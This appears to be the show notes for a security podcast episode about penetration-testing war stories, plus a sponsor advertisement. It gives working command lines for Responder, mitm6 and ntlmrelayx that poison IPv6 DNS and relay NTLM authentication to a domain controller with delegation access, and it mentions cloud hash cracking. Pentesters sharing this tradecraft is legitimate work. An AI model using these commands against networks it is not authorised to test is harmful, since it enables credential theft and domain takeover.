7MS #552: Tales of Pentest Pwnage - Part 45

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today's tale of pentest pwnage covers some of the following attacks/tools: Teleseer for packet capture visualizations on steroids! Copernic Desktop Search Running Responder as Responder.py -I eth0 -A will analyze traffic but not poison it I like to run mitm6 in one window with mitm6.py -i eth0 -d mydomain.com --no-ra --ignore-nofqdn and then in another window I do ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.the.dc -smb2support --delegate-access > relaysRphun.log - that way I always have a log of everything happening during the mitm6 attack Vast.ai looks to be a cost-effective way to crack hashes in the cloud (haven't tested it myself yet)